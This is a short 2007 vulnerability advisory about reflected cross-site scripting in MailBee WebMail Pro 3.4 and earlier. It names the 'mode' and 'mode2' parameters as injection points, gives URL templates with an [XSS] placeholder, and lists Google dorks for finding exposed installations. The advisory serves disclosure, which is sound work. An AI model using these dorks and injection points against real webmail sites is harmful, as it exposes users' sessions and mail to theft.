MailBeeWebMailPro.txt

`+===========================================================================+  
+ MailBee WebMail Pro <=3.4 (XSS) Multiple Remote Vulnerabilities +  
+===========================================================================+  
  
  
Author(s): Ivan Sanchez & Maximiliano Soler  
  
Product: MailBee WebMail Pro 3.4  
  
Web: http://www.afterlogic.com/  
  
Versions: 3.4 (or less)  
  
Date: 05/10/2007  
  
  
---------------------------------  
  
  
  
Not Vulnerable: 4.0 (or superior)  
  
  
  
GOOGLE DORKS:  
------------  
[+] intitle:"MailBee WebMail"  
[+] intext:"Powered by MailBee WebMail"  
  
  
EXPLOIT:  
--------  
  
For example...after the variable "mode2" or "mode"  
  
http://www.[DOMAIN].tld/[PATH]/login.php?mode=[XSS]  
  
http://www.[DOMAIN].tld/[PATH]/default.asp?mode=advanced_login&mode2=[XSS]  
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+===========================================================================+  
+ MailBee WebMail Pro <=3.4 (XSS) Multiple Remote Vulnerabilities +  
+===========================================================================+`